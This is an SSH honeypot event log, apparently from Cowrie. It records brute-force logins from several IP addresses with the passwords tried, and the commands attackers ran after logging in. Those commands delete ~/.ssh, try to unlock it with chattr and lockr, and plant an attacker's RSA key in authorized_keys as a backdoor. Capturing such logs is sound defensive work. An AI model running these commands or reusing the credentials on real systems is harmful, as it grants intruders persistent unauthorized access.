{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:26.471045Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:26.667060Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:27.075497Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:05:27.076219Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:05:27.273244Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:27.274162Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":41136,"dst_ip":"1.2.3.4","dst_port":22,"session":"195af945e554","protocol":"ssh","message":"New connection: 152.32.190.168:41136 (1.2.3.4:22) [session: 195af945e554]","sensor":"my-vps","timestamp":"2025-09-09T04:05:27.590018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:27.590884Z","src_ip":"152.32.190.168","session":"195af945e554"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:27.849216Z","src_ip":"152.32.190.168","session":"195af945e554"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:28.923895Z","src_ip":"152.32.190.168","session":"195af945e554"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:30.186932Z","src_ip":"152.32.190.168","session":"195af945e554"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.190.168","src_port":50412,"dst_ip":"1.2.3.4","dst_port":22,"session":"d70aac3f6e06","protocol":"ssh","message":"New connection: 152.32.190.168:50412 (1.2.3.4:22) [session: d70aac3f6e06]","sensor":"my-vps","timestamp":"2025-09-09T04:05:30.439517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:30.440301Z","src_ip":"152.32.190.168","session":"d70aac3f6e06"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:30.694331Z","src_ip":"152.32.190.168","session":"d70aac3f6e06"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:31.751892Z","src_ip":"152.32.190.168","session":"d70aac3f6e06"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:31.948650Z","src_ip":"152.32.190.168","session":"d2c910de47f8"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:32.007301Z","src_ip":"152.32.190.168","session":"d70aac3f6e06"}
{"eventid":"cowrie.session.connect","src_ip":"34.81.42.153","src_port":37244,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4c50bd1935b","protocol":"ssh","message":"New connection: 34.81.42.153:37244 (1.2.3.4:22) [session: e4c50bd1935b]","sensor":"my-vps","timestamp":"2025-09-09T04:05:42.619896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:42.620784Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:42.844953Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.login.success","username":"root","password":"gorefest","message":"login attempt [root/gorefest] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:43.783514Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:44.283298Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:44.284005Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:44.285017Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:44.510199Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:44.975971Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T04:05:44.976660Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.203008Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.203860Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.session.connect","src_ip":"103.59.95.12","src_port":59578,"dst_ip":"1.2.3.4","dst_port":22,"session":"eaf786337db3","protocol":"ssh","message":"New connection: 103.59.95.12:59578 (1.2.3.4:22) [session: eaf786337db3]","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.337361Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.338127Z","src_ip":"103.59.95.12","session":"eaf786337db3"}
{"eventid":"cowrie.session.connect","src_ip":"34.81.42.153","src_port":37258,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f89b5e32143","protocol":"ssh","message":"New connection: 34.81.42.153:37258 (1.2.3.4:22) [session: 0f89b5e32143]","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.428511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.429895Z","src_ip":"34.81.42.153","session":"0f89b5e32143"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.604931Z","src_ip":"103.59.95.12","session":"eaf786337db3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:45.656188Z","src_ip":"34.81.42.153","session":"0f89b5e32143"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:46.603311Z","src_ip":"34.81.42.153","session":"0f89b5e32143"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"!","message":"login attempt [testuser/!] failed","sensor":"my-vps","timestamp":"2025-09-09T04:05:46.718143Z","src_ip":"103.59.95.12","session":"eaf786337db3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:47.832354Z","src_ip":"34.81.42.153","session":"0f89b5e32143"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:47.993777Z","src_ip":"103.59.95.12","session":"eaf786337db3"}
{"eventid":"cowrie.session.connect","src_ip":"34.81.42.153","src_port":37272,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aa9a2571d8c","protocol":"ssh","message":"New connection: 34.81.42.153:37272 (1.2.3.4:22) [session: 4aa9a2571d8c]","sensor":"my-vps","timestamp":"2025-09-09T04:05:48.058998Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:48.059848Z","src_ip":"34.81.42.153","session":"4aa9a2571d8c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:48.287923Z","src_ip":"34.81.42.153","session":"4aa9a2571d8c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:49.239988Z","src_ip":"34.81.42.153","session":"4aa9a2571d8c"}
{"eventid":"cowrie.session.closed","duration":"6.8","message":"Connection lost after 6.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:49.468604Z","src_ip":"34.81.42.153","session":"e4c50bd1935b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:49.469464Z","src_ip":"34.81.42.153","session":"4aa9a2571d8c"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T04:05:50.451990Z","src_ip":"212.227.235.229","session":"2c916d7b4bd2"}
{"eventid":"cowrie.session.connect","src_ip":"192.210.135.20","src_port":48692,"dst_ip":"1.2.3.4","dst_port":22,"session":"4eeb7406a3d9","protocol":"ssh","message":"New connection: 192.210.135.20:48692 (1.2.3.4:22) [session: 4eeb7406a3d9]","sensor":"my-vps","timestamp":"2025-09-09T04:05:57.107812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T04:05:57.108454Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T04:05:57.218920Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.login.success","username":"root","password":"Zte521","message":"login attempt [root/Zte521] succeeded","sensor":"my-vps","timestamp":"2025-09-09T04:05:57.700818Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T04:05:57.965840Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:57.966505Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T04:05:57.967724Z","src_ip":"192.210.135.20","session":"4eeb7406a3d9"}
